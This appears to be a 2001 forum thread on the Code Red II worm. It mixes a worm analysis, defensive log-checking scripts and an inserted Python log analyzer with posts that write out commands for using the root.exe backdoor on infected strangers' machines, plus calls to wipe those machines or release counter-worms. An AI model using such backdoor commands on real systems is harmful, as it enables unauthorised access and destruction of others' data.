Now, let's see if ZA logs contain enough information to determine if it's a Code Red attack or just another port scanner....
Instead of turning it off (which doesn't really help until you have the very latest firmware), you should forward incoming port 80 [to some non-existent box on your LAN], and your router won't try and parse them any more.
would someone please write a variant that will nuke the c: drive of any infected computer.
I run apache on win32 (I don't like that, either. I wanted to run linux, but my family needs to use this box, too) and I saw another message that mentioned a good response to the code red worm (http://INFESTED SERVER'S ADDY/scripts/root.exe?+/c+start+http://www.digitalisland.com/codered/) and I was wondering if there was a way to make my instance of apache automatically send out this request. Now I know that if I had linux running here, I'd just write a quick shell script to do the dirty work, but that's simply not an option. And as long as I'm asking questions here, wouldn't there be some better page to send them to, or perhaps a script command to knock the worm out? (although that could potentially be troublesome since it might have to delete some of their stuff and crash their machines)
I also am an @Home subscriber, it seems to have gotten a lot worse for me in the past hour.
I'm just surprised with all the <sarcasm>excellent media coverage</sarcasm> that more hype wasn't made about possible attacks today.
I guess crappy reporting takes the weekend off.
I'm not really at threat from this latest version, but I still don't like the fact I'm getting slammed like this.
1. It makes a copy of CMD.EXE called ROOT.EXE in the;
\inetpub\scripts
and
\program files\common files\system\msadc
directories. Does this on both drive C: and D: (doesn't fail if D: doesn't exist).
2. It then runs its attack program code to infect itself upon numerous other boxes. This is done randomly, although there is a bias to attack boxes that are part of the same class A as infected attacker (so it hits your own boxes sooner rather than later). Attack code runs for 24 hours, 48 hours on Chinese language systems.
3. After attack code runs (and it seems to be based on clock ticks, not date), it then writes out a Trojan.
File Explorer.exe (8192 bytes, or 7K as displayed by Windows) is dropped (from the code in the original attacking URL) to the root of drive C: and D: (again, doesn't matter if D: doesn't exist).
4. The system is then rebooted (probably a forced reboot).
5. When the system restarts, it loads the trojan Explorer.exe from the root directory on the boot drive. This code then does several things;
a) Launches the real Explorer.exe, so the system looks normal.
b) Sets SFCDisable in hklm\software\microsoft\windows nt\currentversion\winlogon to some undocumented value. Presumably this disables Windows File Protection (so critical files could be overwritten)
c) Creates two virtual directories (via the registry) in hklm\system\currentcontrolset\services\w3svc\parameters\virtual roots. Called "C" and "D", they are mapped to the root directories of the two drives and permissions are established in the virtual directory to allow script, read, and write access as well as setting execute permissions to scripts and executables.
d) goes into an endless sleep loop.
The end result of all of this action is to leave your box wide open to remote connection and total compromise.
Unlike "Code Red", this worm doesn't attack any single target at any point, although its attack strength seems to be much higher (it launches 300 threads right off, although some may only launch 100), so its propagation seems much higher.
The attack only works properly on Windows 2000 systems (preliminary analysis). ICSA Labs tested against an NT 4.0/IIS 4.0/SP3 box and received a standard error message. Reports from subscribers suggest that XP IIS 5.1 RC1 is invulnerable also. It's expected that it works on PWS and OWS equally to IIS (all on W2K).
It's obviously a short-lived attack, at least the process of collecting victims. What would be done with them once collected is another story. No attempt is made by the worm to send anything "home", although detecting compromised boxes is far too easy (very unfortunately) for anyone outside your network.
Cleaning a compromised box should really be done by reformatting. Although logging is left on for the new virtual directories created (meaning you'd see access in your IIS logs), there's really no way to be sure that files haven't been implanted to leave other backdoors (not as part of this worm, but as part of the use of the opening it creates).
Credits:
The bulk of the analysis was done by Nick Fitzgerald of Virus-L (and friends) and Roger Thompson of TruSecure. Additional help came from Bruce Hughes of the ICSA Labs.
Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
It would be quite ironic and amusing if someone launched a bunch of "cure" email messages with a "fix" attached, when in fact it's, you guessed it...
Code Red 3!
Code Red
Code Red 2: Code Harder
Code Red 3: Code With a Vengeance
POST /scripts/root.exe HTTP/1.0
dir
??
Me
Probably somebody who found out how to use the root.exe executable... I have seen this only once so far, the rest are just 404's (in the most exotic languages).
bash$
welcome. Don't mind the trolls who'll call you names. This is really a friendly place. :)
ok, here it is.. the bestest best code red log checker... checks for cr1 and 2 and gives basic stats before flooding your console with IPs..
hope ya like it... do whatever ya feel like with it.. BSD license.
#!/bin/sh
# Code Red Log Checker by MoOsEb0y
# Scans every log file under the directory given as $1 (access_log format,
# client IP in the first field). Code Red 1 pads its default.ida request
# with N's, Code Red 2 with X's, so the two can be told apart by the filler.
echo Code Red Log Checker by MoOsEb0y
if [ $# -ne 1 ]
then
echo 'usage:'
echo 'cr.sh <path>'
echo 'Use . for the path to scan current directory'
exit 3
fi
CR1='default.ida?NNNNN'
CR2='default.ida?XXXXX'
echo Checking for Code Red 1 Attacks...
echo -n 'unique IPs:'
cat "$1"/* | grep -F "$CR1" | awk '{print $1}' | sort | uniq | wc -l
echo -n 'total hits:'
cat "$1"/* | grep -F "$CR1" | awk '{print $1}' | wc -l
echo Checking for Code Red 2 Attacks...
echo -n 'unique IPs:'
cat "$1"/* | grep -F "$CR2" | awk '{print $1}' | sort | uniq | wc -l
echo -n 'total hits:'
cat "$1"/* | grep -F "$CR2" | awk '{print $1}' | wc -l
echo 'Would you like a detailed report on the IPs attacking your server'
echo -n '(may be long if you run a high-traffic server) (Y/N)?'
read OK
if [ " $OK" = " y" -o " $OK" = " Y" ]
then
echo 'Infected Code Red 1 Hosts:'
cat "$1"/* | grep -F "$CR1" | awk '{print $1}' | sort | uniq
echo 'Infected Code Red 2 Hosts:'
cat "$1"/* | grep -F "$CR2" | awk '{print $1}' | sort | uniq
echo 'Infected Code Red 1 and 2 Hosts:'
# No single log line carries both signatures, so grep for one then the other
# never matches; intersect the two sorted host lists instead.
cat "$1"/* | grep -F "$CR1" | awk '{print $1}' | sort -u > /tmp/cr1.$$
cat "$1"/* | grep -F "$CR2" | awk '{print $1}' | sort -u > /tmp/cr2.$$
comm -12 /tmp/cr1.$$ /tmp/cr2.$$
rm -f /tmp/cr1.$$ /tmp/cr2.$$
echo 'end of listings'
fi
Grepping my logs has never been so fun !!!
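An added example, not MoOsEb0y's script or anything else posted in the thread: the same counting done in Python, telling the two worms apart by the N/X filler in the default.ida request, measuring how much of the traffic comes from the server's own class A and class B (the locality several posts remark on), and emitting the "IP DATE/TIME" lines that abuse desks and log collectors asked for. The log lines, the server address 192.0.2.10 and the access_log layout are constructed assumptions.

```python
"""Code Red I / II probe counter for Apache access logs (added example)."""
import re
from collections import Counter, defaultdict

# Apache access_log line: IP, ident, user, [timestamp], "request line", status.
LINE_RE = re.compile(
    r'^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Code Red I padded the overflow request with 'N', Code Red II with 'X'.
SIGNATURES = {
    "cr1": re.compile(r'^/default\.ida\?N{8,}'),
    "cr2": re.compile(r'^/default\.ida\?X{8,}'),
}


def classify(path):
    """Return 'cr1', 'cr2' or None for a request path."""
    for name, sig in SIGNATURES.items():
        if sig.match(path):
            return name
    return None


def parse_records(lines):
    """Yield (ip, timestamp, family) for every worm probe; skip other lines."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access_log record (or mangled): ignore it
        family = classify(m.group("path"))
        if family:
            yield m.group("ip"), m.group("ts"), family


def same_prefix(ip, other, octets):
    """True if the first `octets` octets of two dotted-quad addresses match."""
    return ip.split(".")[:octets] == other.split(".")[:octets]


def analyze(lines, server_ip):
    """Per-family hit counts, unique sources, locality, and hosts seen with both."""
    hits, same_a, same_b = Counter(), Counter(), Counter()
    sources = defaultdict(set)
    for ip, _ts, family in parse_records(lines):
        hits[family] += 1
        sources[family].add(ip)
        if same_prefix(ip, server_ip, 1):   # same /8 ("class A")
            same_a[family] += 1
        if same_prefix(ip, server_ip, 2):   # same /16 ("class B"), subset of same_a
            same_b[family] += 1
    report = {}
    for family in SIGNATURES:
        report[family] = {
            "hits": hits[family],
            "unique_ips": len(sources[family]),
            "hits_same_a": same_a[family],
            "hits_same_b": same_b[family],
        }
    report["both"] = sorted(sources["cr1"] & sources["cr2"])
    return report


def notification_lines(lines):
    """One 'IP DATE/TIME' line per probe, sorted, for forwarding to an abuse desk."""
    return sorted(f"{ip} {ts}" for ip, ts, _family in parse_records(lines))


# Constructed sample log; addresses are documentation/private ranges, not real hosts.
SERVER_IP = "192.0.2.10"
SAMPLE_LOG = """\
192.0.2.44 - - [04/Aug/2001:19:50:18 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 296
192.0.2.44 - - [04/Aug/2001:19:58:09 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 296
192.0.7.8 - - [04/Aug/2001:20:01:12 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 296
192.168.1.5 - - [04/Aug/2001:20:02:40 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 296
198.51.100.7 - - [04/Aug/2001:20:04:03 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 296
203.0.113.9 - - [04/Aug/2001:20:05:55 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 296
203.0.113.9 - - [04/Aug/2001:20:06:30 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 296
198.51.100.7 - - [04/Aug/2001:20:07:00 -0400] "GET /index.html HTTP/1.0" 200 1843
this line is not an access_log record and must be skipped
""".splitlines()

if __name__ == "__main__":
    import json
    print(json.dumps(analyze(SAMPLE_LOG, SERVER_IP), indent=2))
    print("\n".join(notification_lines(SAMPLE_LOG)))
```

Run against a real access_log with `analyze(open("access_log"), "<your IP>")`; the error_log format seen elsewhere in the thread is not parsed by this regex.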
Nah, that was just the first occurrence on your subnet. It had to get there somehow. Even though this thing is concentrating on subnets, it must branch out or otherwise it wouldn't've propagated outside the subnet it started on. I'm seeing it on 66; others are reporting it on 4, 24, and more.
Liberty in your lifetime
I can't seem to figure out how to post a new comment, only reply to ones already posted. How do I post a comment?
Code Red I: 1.2 billion dollars
Code Red II: > 1.2 billion dollars (presumably, since it's badder than the original)
Being a trolling AC on Slashdot: priceless
There are some things that money can't buy. For everything else, there's Micro$oft.
I wrote a crude script that does this but mails information to abuse departments of ISPs where they can match up the hosts with their users and contact them if they wish. The parent poster may want to add this feature to his code, and I might clean my code up later and post it.
If there is an open IIS webserver on the Internet running on a mission critical system then the people deserve to be taken out. The only thing running a web server should be a dedicated web server box. If you can't afford to have the box go down due to other stuff running on it, you need to rethink running web services on it. BTW: A hospital? If a hospital ran IIS on anything life threatening I'd sue them for malpractice. :-)
The worm not only affects windows machines.. It also taxes the infrastructure.
several ISPs w/ proxy cache servers are noticing the hit as their machines try to handle the traffic.
also, code red also affects other devices other than win2k.... [eg: cisco 600 dsl modems... which do not replicate the worm, but are affected by it due to a separate unrelated bug] and other products as well that have built in IIS servers (including some "hardware" products that have IIS embedded... yes... there are some out there that are affected)
It affects unix machines that are having to respond to the "get" request
--
Time is on my side
Considering that Apache is the most widely used web server you'd think it would be attacked more. OK maybe the apache folk are nice and ethical people who don't call people communists or un-american and therefore don't piss off as many people but still a kiddie is not that selective.
War is necrophilia.
Just tried it. The question I asked was "will code red ii sink microsoft". The answer was... guess what...no, not that one, we're talking about Code Red here, not Sircam.
It was: "Most likely".
If you have Qwest DSL it seems you are out of luck. They will not give you Any information you need to download the CBOS upgrades from Cisco (I am on the phone with them now) The guy I am talking to says they have the 2.4.1 upgrade but that's it (and no one there knows the URL for it to boot).
Ok phone call is over. I asked the tech why I cannot have the keys I need to get the patches from Cisco and he tells me it would be like handing me a registration key for WIN 98 when I don't own it. Excuse me if I am mistaken but I HAVE the router. In fact I have three of them because they would rather send me a new one whenever I have a connection outage for more than a few hours rather than admit they are having network problems. I swear I am switching my ISP on Monday...
http://support.microsoft.com/support/kb/articles/Q202/0/13.ASP
May I suggest iisreset /stop?
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
"So after the last 20 root exploits of Linux and Apache, we shouldn't use that either?"
I believe the last time something this bad hit *nix platforms was about 1988, and it was called Morris. (Yeah, I know it was Sendmail and finger, but you get my point, no?)
You know, you're missing the point. A well set up UN*X box takes very little administration. The cost of administering a UN*X box will normally be lower than a Windows box doing the same job, because although the administrator costs more, you need h[im|er] for fewer hours.
I'm old enough to remember when discussions on Slashdot were well informed.
I had some fun with this one: (URL follows) http://{infected-IP}/scripts/root.exe?/C%20dir%20c :\%20/S
one, two, one two like a duck
The "too busy" reply happens for any HTTP request, as one would expect, but suggests that something beyond hosting the trojan is happening to the compromised machines. Either they're getting a lot of HTTP requests from somewhere, or something is happening on them.
I think someone needs to write virii to combat these Code Red virii....although that would probably increase the network slowdown...for a while anyways..
Notice the gratuitous X's instead of N's...
Of course, Apache just laughs back with a 404.
Don't sweat the petty things. But do pet the sweaty things.
So after the last 20 root exploits of Linux and Apache, we shouldn't use that either?
Hmm. I guess that means I'm back to my VIC-20!
Has anyone figured out how to execute commands using a POST request to root.exe? My curiosity (heh heh :)) has made me play with it a bit (but not too much, don't want the feds knocking on my door asking me what the phrase "Hacked by Chinese!" means to me) .. I can't seem to figure it out.
I tried variants of the following:
<HTML>
<BODY>
<FORM METHOD="POST" ACTION="http://xx.xx.xx.xx/scripts/root.exe">
<INPUT TYPE="SUBMIT" NAME="" VALUE="exit ">
</FORM>
</BODY></HTML>
trying to send exit to the shell, but the "script" (root.exe) never finishes. I'm guessing that the data is coming over the pipe but lynx won't show it to me until the request is finished. I tried passing the NAME %1, %2, etc. (DOS style) but that didn't work either.
As soon as I get a directory listing I am going to have a moment of silence for all these poor fucks.
--
Well, if the web server which you're running is IIS and you're affected...then you can't trust your logs as you don't know how many types of attacks have succeeded and how many people are using your system.
WHY do i have to pay extra for the functionality of NOT being susceptible to virii and net attacks?
:-p
Actually, you don't. Linux is free
We don't have a state-run media we have a media-run state.
All you do-gooders who are flitting around deleting root.exe -- nice job. Now there is no way to actually interact with the remote machine to remove the rest of the code, until it's reinfected anyway
Just keep an eye out to security.debian.org. There was a fix for an apache remote exploit on July 28.
Also, that's the fix, it doesn't say when the problem arose.
Despite the best intentions you will be breaking the law. Keep that in mind.
Several of us in #ljr on openprojects.net have been getting this for ages.
I'm getting one attack about every 20 minutes, most are from servers that don't have anything on, although I've had a couple of "real" websites attack me.
http://isorox.dyndns.org/~iso/ is a monitoring thing.
Yeah, but you can fix that by running the update tool (up2date isn't it) shortly after you first log on.
My only political goal is to see to it that no political party achieves its goals.
What you need to do is add /c followed by the command to the end of the url as a query parameter. For example:
GET /scripts/root.exe?/c+net+send+localhost+"Your+comp uter+is+infected+with+Code+Red+2.+See+www.incident s.org+for+instructions+on+how+to+remove." HTTP/1.0
This command (without the spaces that slashdot inserts) will pop up a message box on the local machine with the specified message.
The problem is, www.incidents.org only has instructions on removing the original CodeRed. Nothing on removing the new variant, which also requires removing explorer.exe from c:\. So, I'd like to be able to use a better URL, if I had one.
--LeBleu
If you're reading this you're part of the mass hallucination that is Kevin the Blue.
I'm going to have to defend the guy as I run Windows as well.
In Depth Knowledge of FP2000 - Any of ya'll actually use this crap? I can't figure it out. I have clients that do EVERYTHING in FP and on occasion I'm called in to help them out. I COULD tell them to pick up Dreamweaver, but most are unwilling to pay for it...they use FP as it came bundled. I COULD tell them how to do everything from notepad and then how to set up an FTP connection through the cli, but if I did that I wouldn't be working for them. I wish I knew how people used this piece of crap software as I've never been able to get it to do crap for me, yet idiots seem to figure it out enough to connect to their servers and screw up pages. In this sense, ya use what the client is using...if you don't you aren't much of a consultant.
Same goes with Windows. I tell all my users that I can set up *nix boxes for their networks. This would be really fricken cool IF I was on site more than an hour or two a month. These guys all want to admin their own servers and to be honest, the costs saved by doing it themselves far outweigh the cost of getting zapped by any of the worms - so far - for a small business. If you can't afford a full time WinAdmin, you certainly can't afford a full time UnixAdmin.
WinAdmins are a dime a dozen and EVERYONE knows enough to be able to set these damn things up. Most businesses I deal with have a semi-dedicated winadmin who is part network assistant / mostly something else. It's something I can show a business how to do in an afternoon with a few small books left in case they need them.
On the other hand, I have a thousand page UNIX book that I still consider a starters guide that I've used for over 10 years now - "UNIX System V Release 4 - An Introduction" and it doesn't even cover things like Apache or SendMail in depth (or at all...I can't remember...I got enough other books on those subjects). It's a fricken introduction for christ's sakes. I could have gotten a few MCSE's from a book that size.
So fuck it...if ya'll want to play the assholes and be all high and mighty about how 'l33t ya'll are go ahead. It's exactly the reason you had no friends in high school. Geeks think they are always right and everyone else is wrong. It's the same attitude the jocks had, but worse.
I HATE M$ and I wouldn't suggest using it to anyone, BUT if someone suggests it to me, I'm going to give them the best service I can on that platform and I'm not going to turn my nose up at them. And YES, I did get hit by RedCode last time and this was after doing everything M$ said to do...Oops, apparently if you make any changes to the system AFTER you've done these, certain things will reenable all the changes you've made. I've now got a system where my boys have to go through a tedious procedure ANYTIME they [install / uninstall / reconfigure] anything on my WinServers to ensure that nothing was undone. To be honest, it wouldn't be a bad practice on *nix to do the same thing and reaffirm all patches / etc stayed intact after installs. With the new RPMs (ok they are new to me...I'm used to installing with a MAKE) you don't know what the hell is being upgraded or what dependencies are being imported a good deal of the time.
Shit, anymore it's almost simpler than Winders...rpm some app and find they've rewritten your secured files with something wide open and the win boys will be laughing at all you dumbass linux people...now who'd CLI over an app without knowing what was on it?
have it go nuts infecting, then on the 20th instead of ddos'ing some static ip, ddos microsoft by all grabbing the patch at once.
You're not alone. I only regret that the first worm wasn't that aggressive.
Look at his street address...
- Get infected by Code Fix
- Get a list of CR-infected hosts from logfile
- Infect all CR-infected hosts with Code Fix
- Install IIS patch and reboot
You could also just loop for eg. ten hours and monitor for attempts made by Code Red, infecting the originating servers with Code Fix. When the 10 hours is up, install IIS patch and reboot.
Ya know.. heh.. Gibson is one of the folks capable of authoring a fine beast such as Code Red. I'd almost go so far as to say "few" folks capable of doing it.. Mr. Gibson, Sir? Where were you on the night of July 31, 2001?
The same CNN that was holding a CodeRed vigil this week, predicting the impending doom of the internet as we know it is once again missing the boat.
No story on CNN about what is probably one of the most embarrassing days for Microsoft EVER: Millions of people have access to a root trojan on millions of consumer boxes. AND THIS IS A COMPANY THAT WANTS TO INTRODUCE PASSPORT!! WTF!
Note to corporate manager: Take your head out of your *ss. If your "IT" guy missed the first CodeRed and now you're dealing with this. It's time to find a new "IT" guy. Preferably one with a reasonably big large against Micro$oft products.
Also, if anyone is interested in a surprisingly GOOD article about Microsoft's arrogance read this month's IEEE Spectrum.
------ Tim O'Brien
@Home is indeed apparently getting hit hard.
-- Veni, vidi, dormivi
grow your pr0n collection? augment your NJB usage? Someone already posted a request that will search for mp3s - just change mp3 to (xxx|harddcore|sex) :)
They that quote Benjamin Franklin on liberty and safety deserve neither.
Unless you have a way of serving at port 80 and logging how many hits take place there, you won't know. I would consider getting a personal copy of ZoneAlarm and blocking port 80 to begin with if you are not serving pages, rather than trying to get a peek at what's coming through. It might cause you more damage later on when you least expect it.
of hits on port 80, I started checking, they all ran IIS, I forwarded off a list of them to the abuse people as per technical support, they refused to help any more stating it wasn't their problem.
"stays crunchy even" you say?
The licensing issue is irrelevant too. If my microwave catches fire, I can sue somebody. If my custom-built house collapses, I can sue somebody. If my shotgun explodes, I can sue somebody.
First of all, the question is not IF you can sue SOMEBODY. You can ALWAYS sue somebody. The question is, does your case stand a chance in hell of being won?
Secondly, who would we sue if Linux was found to have a serious flaw like the one in IIS? Don't you dare say the flaw would be fixed, because the flaw in IIS has already been patched, about 2 months ago, well before Code Red came out.
"And like that
The vulnerability itself is NOT in the IIS service, but in the indexing service that needs IIS to work. The indexing service is installed with IIS4 on NT, IIS5 on 2000. [it is also installed with the PWS on 2kpro]
BTW IIS3 is also vulnerable somewhat, but since it has many, many other holes, the only remedy for IIS3 is to upgrade to at least IIS4 + patches.
--
Time is on my side
net send 127.0.0.1 Your machine is compromised
I deliberately started apache (as an @home customer i'm not 'supposed' to run servers) just to watch the incoming Code Red connections... in the past 4 hours, i've seen 215 connections, most of which from the same class B as me:
cr806461-a:/var/log/apache# cat error.log | grep "24.156" | awk {' print $8 '} | uniq | wc -l
143
This one is spreading fast!
careful - the new strains use default.ida?XXXXXXX. Just grepping for default.ida should be enough...
Turning the web server off is not enough - it will still crash it. Your only course of action is to either:
1) Contact your ISP, have your connection changed to a static IP if it isn't already, and use RFC1483 bridging.
2) Upgrade to version 2.4.2 of the CBOS firmware.
it fights fire with fire but its still illegal.
It fights fire with water... A fire in someone else's house... Which would have set your house on fire too, except it's made of fireproof material (or you have a "firewall" between your houses).
May or may not be legal when you look at it that way. I'm pretty sure you can legally break into someone's house if you see flames coming out of the roof.
ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
Holy shit! I just ran that against my logs, and I've got 493 so far!
:)
Good thing I'm running Apache
You can accomplish anything you set your mind to. The impossible just takes a little longer.
> Wouldn't the best and quickest fix be to telnet into the machines and give 'em the old:
c:\deltree windows
> maybe we could even install scripts on our own servers to automatically do this each time we receive a new attack. Automated windows repair solutions.
That's my idea too.
Maybe not deleting \windows only. Wipe all the machine. At least, the cry out would be such, that no-one will ever install IIS.
Btw, I wish that the first worm had done that. 309 000 servers wiped off, including some of the update.microsoft.com (and as this worm also scans private subnets, I bet that half of microsoft servers would have died). Woooov. This would have rocked.
Internet black day.
according to ntbugtraq, the worm copies cmd.exe to the scripts dir under iis. i've been getting a lot of these now in my snort log:
[**] [1:1002:1] WEB-IIS cmd.exe access [**]
[Classification: Attempted User Privilege Gain] [Priority: 8]
08/04-20:59:21.340539 165.247.90.38:3711 -> 165.247.246.23:80
from different ip's etc.
--- d'oh
Nope, it works. I just checked. It would be *amazingly* trivial to wipe this poor bastard's hard drive right now... Golly, the power is making me dizzy. :)
:)
The deal is that it's running the root.exe (actually cmd.exe) as a cgi process. Look it up for specifics.
Now, I wonder if I should bother at least finding a way to alert these people. For example, I could probably do something like run IE and have it go to a page about Code Red. Assuming the machine has a monitor and is in use by people (probably the case for most of the DSL IPs, anyway), the person will come back to their machine to find info ready for them. Or it might just pop up while they're using it!
For those who are interested in the source:
http://www.kryptolus.com/red.txt
On another note, a server whose identity I will not name (solaris w/ apache) was hit with 17000 attacks as of yesterday (the server handles a lot of ips).
--
Violators will be prosecuted and prosecutors will be violated.
I pointed my browser at some of the IP's that tried to infect my machine. I found the following pages (or variants of the following (red on black):
fuck CHINA Government
fuck PoizonBOx
contact:sysadmcn@yahoo.com.cn
fuck USA Government
fuck PoizonBOx
contact:sysadmcn@yahoo.com.cn
sex0r lowd l33tn3ss
sex0r geeklab.org
contact:lowd@geeklab.org
If my enemy's enemy is my friend, what happens if my enemy is his own worst enemy?
I've had 155 hits so far ("grep /default.ida /etc/httpd/logs/access_log") - most of them have been within the last 24 hours or so.
Not that I'm vulnerable (running Linux, OpenBSD, Apache and all), but it's still an annoyance.
-- Ed Carp, N7EKG erc@pobox.com PGP KeyID: 0x0BD32C9B What I'm up to: http://intuitives.mine.nu
1/8: random
4/8: 192.168.x.x
3/8: 192.x.x.x
This would be consistent with my logs, I've been hit about 100 times now.
Oh hell yeah, without a doubt.
Intelligent Life on Earth
I've gotten quite a few logs from this worm from *apparent* microsoft personal web servers (on 98SE and the like). does anybody know if it can infect this? i thought that pws was a stripped down form of IIS...
Who knows, maybe now is the time to buy again some RHAT stock... Indeed, people will need another OS once they've thrown out MShit.
Mail those logs!
From http://dshield.org/codered.html:
As you have probably heard, the Code Red worm has infected over 100,000 machines running Microsoft IIS, and the total is rising. We need to identify the infected machines so that the owners of these machines can be notified so that they can be fixed. We are appealing to DShield submitters to do a special one time only submission for log entries that contains this information.
Linux and other *NIX users Can do this by changing to the directory where your web server logs are located and executing a script like this:
grep 'default.ida?NNNNN' access_log | mail -s 'APACHE' redalert@dshield.org
Carousel is a lie!
Boot Win2k, use CommView - the packets are all similar (approx 64bytes) - still being spammed here, but it's only taking ~2% of my bandwidth...
Ha ha, that was funny! Of course we know worms never infect unix or open source systems !
"And like that
---------- Forwarded message ----------
Date: Sat, 4 Aug 2001 23:00:39 -0600 (MDT)
From: Alfred Huger
To: incidents@securityfocus.com
Subject: Code Red Revision
Evening all,
I had planned on sending out a thanks this evening to all of the contributors (in terms of logs) who came through on the Code Red (revision 2) surge last week. Regrettably it looks like I will have to wait due to a new variant or rather new worm on the loose.
As some of you know a new worm has been released into the wild which uses the same exploit - the Microsoft Indexing Server/Indexing Services ISAPI Buffer Overflow Attack (http://www.securityfocus.com/bid/2880). However, this is most likely not a revision of the initial Code Red worm but a new worm which simply uses the same entry point. It carries an actual malicious payload and has a number of other very interesting features.
The SecurityFocus ARIS Team and eEye Digital Security will be releasing an in-depth writeup in the next hour or two with technical details as well as information about its spread to date. As opposed to filling the list with logs of attacks I will reserve the list for discussion of the worm's payload and features - after we post an analysis. So very shortly.
Until then, it would be fantastic if you can send your log files to: aris-report@securityfocus.com
Because we have caught this very early we plan on starting the notification process tonight. We sent close to 400,000 notifications against Code Red 1 & 2 previously - hopefully because we are on top of this our notifications now will help address the situation much, much faster.
If you would like to send offending IP data - Please send it in the following format:
IP ADDRESS DATE/TIME
Or something similar to this. Please ensure the information is contained to IP address and date per line as we do our notification automatically and our system needs to be able to understand the logs you send us.
We will be posting more shortly.
-Al VP Engineering SecurityFocus.com "Vae Victis"
http://www.codewolf.com - Just good stuff to waste time
Very true, very true.
I found a win98 box with its C drive open for global read/write access on a company LAN, a few weeks ago... uploaded a hello.bmp and made it the desktop wallpaper. Shortly before setting the read-only attributes on hello.bmp and win.ini (stores background information) and adding some lines to autoexec.bat to renew hello.bmp and win.ini every bootup just in case the user managed to change it back.
Wonder what happened to the poor guy when he couldn't figure out how to change the background and had to get the sysadmin in...
> May or may not be legal when you look at it that way. I'm pretty sure you can legally break into someone's house if you see flames coming out of the roof.
yes but what was said was an anti worm..... which replaces even those not burning yet but those that could be burnt ... firebreakers are legal but only by firefighters sanctioned by the government. breaking into a burning house is still robbery unless you carry the baby out to safety.. don't mind the mumbling its getting late here
Apache... you'd have to be running a web server of some kind to be affected at all.
/MC
I've compiled a list of IPs that have made 404 hits on default.ida. Companies like @home and speakeasy (my ISP) need to crack down on IIS users on home DSL networks and get them to install the patch. This many infected hosts is not a good thing.
isomerica.net | Foonetic IRC
Go away Wipo.
Yes, and it would be especially funny if, like Robert T. Morris Jr. before you, you weren't quite as smart as you thought.
This next song is very sad. Please clap along. -- Robin Zander
All this comes at a bad time for Mountain Dew's new fruity flavor, called Code Red, too.
First month it's on the market, and the brand new trademark is sullied by bad references to computer hacking, worms, viruses and international disputes. Is there truly "no bad publicity"?
Of course, like the word 'spam' and the Hormel product SPAM(tm), trademark law rightfully doesn't support serious legal implications, and wouldn't stand a chance against mob inevitability even if it did. Just kinda funny to watch it happen.
The ARP storm on @Home let up here in Chicago about 8:45 AM CDT. I would say that I am still seeing an above-average number of ARP who-has packets, but far less frequently now. I can still contact several servers that recently probed me, so I trust they haven't been booted my @Home, but something significant has happened.
Here it is (I did this quite a while ago)
r i=%22 + window.location))
...
g i?url=%22 + window.location))
javascript:void(window.open( %22http://www.netcraft.co.uk/whats/?host=%22 + window.location))
On the same subject, check HTML validity:
javascript:void(window.open( %22http://validator.w3.org/check?uri=%22 + window.location))
... CSS validity...
javascript:void(window.open( %22http://jigsaw.w3.org/css-validator/validator?u
... links
javascript:void(window.open( %22http://www.htmlhelp.com/tools/valet/linktest.c
... bookmarklets are fun!
I'm old enough to remember when discussions on Slashdot were well informed.
absolutely - use Multicast Groups as well.
Why don't you make it Code Red Hat... the worm finds machines infected and then reformats them and installs Redhat. That would take care of the MS infinite bug problem.
Seriously though it should be Microsoft releasing a antidote virus that cleans up all their crappy infected servers. It seems like Microsoft is allowing this to continue because they get a ton of free media coverage... any publicity is good publicity.
My first one was: 63.122.141.50 - - [04/Aug/2001:15:13:17 -0600]
Somehow this is boring! ... many more boring discussions.
;^)]
The only thing I read about Code Red II are statistics about the infection rate, how those random generators work, how easy it is to infect a wellknown company's product, that maybe some rootkit gets installed
But all this is selfish. A few days ago, a virus hit us which caused at least a little bit fun. It was this SirCam thing. This virus made it possible to read foreign documents! This was more fun, this was not selfish, this virus hacker let us all participate!
I just wait for the next Code Read worm, which hopefully combines the document sharing code of SirCam with the infection rate of Code Red or maybe it could create web pages with links to such data. Would be really funny to read secret documents of companies. Such a worm will sure cause a rethinking about what products should be used, and what products one should leave in the store.
But as long as those virus hackers are selfish and install rootkits only, we all read just statistics, statistics, technical discussion and all this boring stuff.
[Of course I do not run those wellknown company's product, I do not even have them installed! Just sitting and waiting for those documents to drop in
It's like it's raining outside, and I didn't notice until I opened the door and looked outside... I didn't know anything was going on till I read slashdot, saw this article, thought "I wonder if any are hitting me" and check my web logs... a voila, there were a few hundred hits from Cr2, coming in every 1-2 minutes. amusing.
Or have it go to goatse.cx. That should convince them to patch their system.
On my OS X Apache box on my desk at work, default.ida is now a copy of http://www.hideaway.net/newsletter/iis_ida_overflow.txt ...
If I keep getting garbage in my server logs, it may become a 10MB text file of nothing but repetitious copies of the alert... though I'm not sure how much it'd help.
You want it? You got it...
i am a soviet space shuttle
Over four hundred probings from 66.* today. For a while I had a webserver running just to catch these things but now there's just too many. I'm glad my website doesn't have its own IP address -- when CodeRed scans my site's IP address, it gets the host's main page, not mine.
Liberty in your lifetime
I'm warned that smoking and drinking are bad for my health
Medicines and drugs aren't legal unless they're fully tested and approved
My car doesn't lock up and freeze
My microwave doesn't blue screen and cook my brain inside out.
SO WHY THE HELL IS THE CORE FUNCTIONALITY OF MY PC allowed to distribute my personal information, crash during critical functionality, be susceptible to cracks and attacks that are easily preventable.
WHY do i have to pay extra for the functionality of NOT being susceptible to virii and net attacks?
WHY doesn't microsoft NOTIFY me of the risks of using its OS?
I hope no one's bank is trusting Microsoft, I hope anyone doing online transactions doesn't trust Microsoft. I hope no one keeps personal, private, confidential and financial data on their PCs.
I hope no one running Windows is on the internet for that matter.
